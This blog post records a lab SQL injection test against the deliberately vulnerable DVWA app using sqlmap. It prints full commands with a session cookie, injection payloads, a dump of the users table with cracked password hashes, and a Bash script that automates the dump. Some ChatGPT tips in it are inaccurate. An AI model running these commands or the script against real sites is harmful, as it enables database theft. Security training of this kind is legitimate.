[Research] Penetration testing DVWA 1.10 with sqlmap 1.9.2
2025-05-09
First set up the target machine:
[Research] Installing the Damn Vulnerable Web App (DVWA) 1.10 penetration-testing practice (target) platform (Windows 2025)
https://shaurong.blogspot.com/2025/05/damn-vulnerable-web-app-dvwa-110.html
Default account admin, default password password
********************************************************************************
Using https://192.168.128.144/dvwa/ as the target, explain the concrete steps for a successful penetration test with sqlmap?
ChatGPT says:
Below are the complete, concrete steps for a SQL injection penetration test with sqlmap against the target https://192.168.128.144/dvwa/ (with a successful test as the goal), assuming you have already set up DVWA and can reach it normally through the URL.
✅ Prerequisites (required)
Confirm DVWA is running and the URL is reachable:
https://192.168.128.144/dvwa/
Set DVWA security to Low:
Log in as admin / password
Click DVWA Security in the left menu → set it to Low
Confirm the target page with the SQL Injection feature exists:
Click SQL Injection in the left menu; you get the URL
https://192.168.128.144/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
**********
Author's note: whether DVWA security is set to Low or not set at all, the URL actually obtained in testing is
https://192.168.128.144/dvwa/vulnerabilities/sqli/
Perhaps this is a DVWA version difference, or a ChatGPT error,
but sqlmap must be given a URL that carries parameters, so the tests below still use the parameterised URL ChatGPT gave;
**********
Disable CSRF protection (optional):
If you run into CSRF token problems during testing, you can set $_DVWA[ 'default_security_level' ] = 'low'; in /config/config.inc.php
🧪 Concrete penetration-test steps
Step 1: Capture the Cookie
Because DVWA has a login mechanism, sqlmap must send the Cookie along, otherwise it is redirected to the login page.
Copy the Cookie using the browser developer tools (F12):
On the logged-in page press F12 → Network → reload the page → click /vulnerabilities/sqli/ → Headers → find and copy a Cookie that looks like this:
The logged-in account's Cookie was found to be PHPSESSID=nq6m5qpstheh95saak75aa7phs
Step 2: Run sqlmap
Use the following command:
sqlmap -u "https://192.168.128.144/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=nq6m5qpstheh95saak75aa7phs; security=low" --batch --level=3 --risk=2 --dbs
Command explanation:
- -u: target URL (note that it includes the parameters)
- --cookie: attach the login Cookie
- --batch: accept the default options automatically (no manual interaction needed)
- --level=3 --risk=2: raise the test intensity and coverage
- --dbs: list the database names
Actual test
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "https://192.168.128.144/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=nq6m5qpstheh95saak75aa7phs; security=low" --batch --level=3 --risk=2 --dbs
[sqlmap banner: {1.9.2#stable} https://sqlmap.org]
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 04:27:06 /2025-05-09/
[04:27:06] [INFO] resuming back-end DBMS 'mysql'
[04:27:06] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: id=1' AND 6579=(SELECT (CASE WHEN (6579=6579) THEN 6579 ELSE (SELECT 6297 UNION SELECT 6929) END))-- -&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4045 FROM(SELECT COUNT(*),CONCAT(0x7178786a71,(SELECT (ELT(4045=4045,1))),0x716a786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SNWM&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7006 FROM (SELECT(SLEEP(5)))jYoz)-- GoNd&Submit=Submit
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7178786a71,0x7474637a48656f4553766d58614871664f644f5351516474775a744d7564475276465059774f4a47,0x716a786a71)-- -&Submit=Submit
---
[04:27:06] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.2.12, Apache 2.4.58
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[04:27:06] [INFO] fetching database names
available databases [6]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[04:27:06] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.128.144'
[*] ending @ 04:27:06 /2025-05-09/
┌──(kali㉿kali)-[~]
└─$
Step 3: Check the response
If it succeeds, you will see something like:
[04:27:06] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.2.12, Apache 2.4.58
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[04:27:06] [INFO] fetching database names
available databases [6]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
Step 4: List the tables in dvwa
sqlmap -u "https://192.168.128.144/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=nq6m5qpstheh95saak75aa7phs; security=low" -D dvwa --tables
Actual test
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "https://192.168.128.144/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=nq6m5qpstheh95saak75aa7phs; security=low" -D dvwa --tables
[*] starting @ 04:28:39 /2025-05-09/
[04:28:39] [INFO] resuming back-end DBMS 'mysql'
[04:28:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: id=1' AND 6579=(SELECT (CASE WHEN (6579=6579) THEN 6579 ELSE (SELECT 6297 UNION SELECT 6929) END))-- -&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4045 FROM(SELECT COUNT(*),CONCAT(0x7178786a71,(SELECT (ELT(4045=4045,1))),0x716a786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SNWM&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7006 FROM (SELECT(SLEEP(5)))jYoz)-- GoNd&Submit=Submit
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7178786a71,0x7474637a48656f4553766d58614871664f644f5351516474775a744d7564475276465059774f4a47,0x716a786a71)-- -&Submit=Submit
---
[04:28:39] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.58, PHP 8.2.12
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[04:28:39] [INFO] fetching tables for database: 'dvwa'
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
[04:28:39] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.128.144'
[*] ending @ 04:28:39 /2025-05-09/
┌──(kali㉿kali)-[~]
└─$
Step 5: Extract the data in the users table
sqlmap -u "https://192.168.128.144/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=nq6m5qpstheh95saak75aa7phs; security=low" -D dvwa -T users --dump
Actual test
┌──(kali㉿kali)-[~]
└─$ sqlmap -u "https://192.168.128.144/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=nq6m5qpstheh95saak75aa7phs; security=low" -D dvwa -T users --dump
[*] starting @ 04:29:12 /2025-05-09/
[04:29:12] [INFO] resuming back-end DBMS 'mysql'
[04:29:12] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: id=1' AND 6579=(SELECT (CASE WHEN (6579=6579) THEN 6579 ELSE (SELECT 6297 UNION SELECT 6929) END))-- -&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 4045 FROM(SELECT COUNT(*),CONCAT(0x7178786a71,(SELECT (ELT(4045=4045,1))),0x716a786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SNWM&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7006 FROM (SELECT(SLEEP(5)))jYoz)-- GoNd&Submit=Submit
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x7178786a71,0x7474637a48656f4553766d58614871664f644f5351516474775a744d7564475276465059774f4a47,0x716a786a71)-- -&Submit=Submit
---
[04:29:12] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.58, PHP 8.2.12
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[04:29:12] [INFO] fetching columns for table 'users' in database 'dvwa'
[04:29:12] [INFO] fetching entries for table 'users' in database 'dvwa'
[04:29:12] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[04:29:15] [INFO] using hash method 'md5_generic_passwd'
[04:29:15] [INFO] resuming password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[04:29:15] [INFO] resuming password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[04:29:15] [INFO] resuming password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[04:29:15] [INFO] resuming password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
Database: dvwa
Table: users
[5 entries]
+---------+---------+-----------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | user | avatar | password | last_name | first_name | last_login | failed_login |
+---------+---------+-----------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1 | admin | /hackable/users/admin.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | 2025-05-08 14:39:31 | 0 |
| 2 | gordonb | /hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | 2025-05-08 14:39:31 | 0 |
| 3 | 1337 | /hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | 2025-05-08 14:39:31 | 0 |
| 4 | pablo | /hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | 2025-05-08 14:39:31 | 0 |
| 5 | smithy | /hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | 2025-05-08 14:39:31 | 0 |
+---------+---------+-----------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
[04:29:15] [INFO] table 'dvwa.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.128.144/dump/dvwa/users.csv'
[04:29:15] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.128.144'
[*] ending @ 04:29:15 /2025-05-09/
┌──(kali㉿kali)-[~]
└─$
You will see the users' account and password data.
✅ Other parameters (optional)
--passwords: list the account and password information found
--os-shell: attempt to open a shell (needs to be paired with a command-injection target)
--threads=10: speed up testing
⚠️ Notes
Only ever test on an authorised target machine; never use this against unauthorised websites (illegal)
Make sure the DVWA page path and parameters are correct
If sqlmap cannot inject successfully, try adjusting --level and --risk
********************************************************************************
ChatGPT says:
Here is a Bash script:
📜 Script: dvwa_sqlmap_attack.sh
#!/bin/bash
# =========[ Fill in the variables below by hand ]=========
TARGET_URL="https://192.168.128.144/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
COOKIE="PHPSESSID=replace-with-your-session-id; security=low"
# =========================================================
set -e   # stop at the first sqlmap run that fails
echo "[1/4] Listing databases..."
sqlmap -u "$TARGET_URL" --cookie="$COOKIE" --batch --level=3 --risk=2 --dbs
echo "[2/4] Listing tables in the dvwa database..."
sqlmap -u "$TARGET_URL" --cookie="$COOKIE" --batch --level=3 --risk=2 -D dvwa --tables
echo "[3/4] Listing columns of the dvwa.users table..."
sqlmap -u "$TARGET_URL" --cookie="$COOKIE" --batch --level=3 --risk=2 -D dvwa -T users --columns
echo "[4/4] Dumping the dvwa.users table..."
sqlmap -u "$TARGET_URL" --cookie="$COOKIE" --batch --level=3 --risk=2 -D dvwa -T users --dump
echo "✅ Attack complete."
✅ Usage:
Save the script above as dvwa_sqlmap_attack.sh
Change the Cookie to the value from your browser when logged in to DVWA:
COOKIE="PHPSESSID=123456abcdef7890; security=low"
Give it execute permission in the terminal:
chmod +x dvwa_sqlmap_attack.sh
Run the script:
./dvwa_sqlmap_attack.sh
🛠 Additional tips:
If there are HTTPS certificate errors, you can add --ignore-code=403 or --force-ssl to the sqlmap command.
If it hangs during execution, you can try adding --threads=5 to speed up testing.
(End)


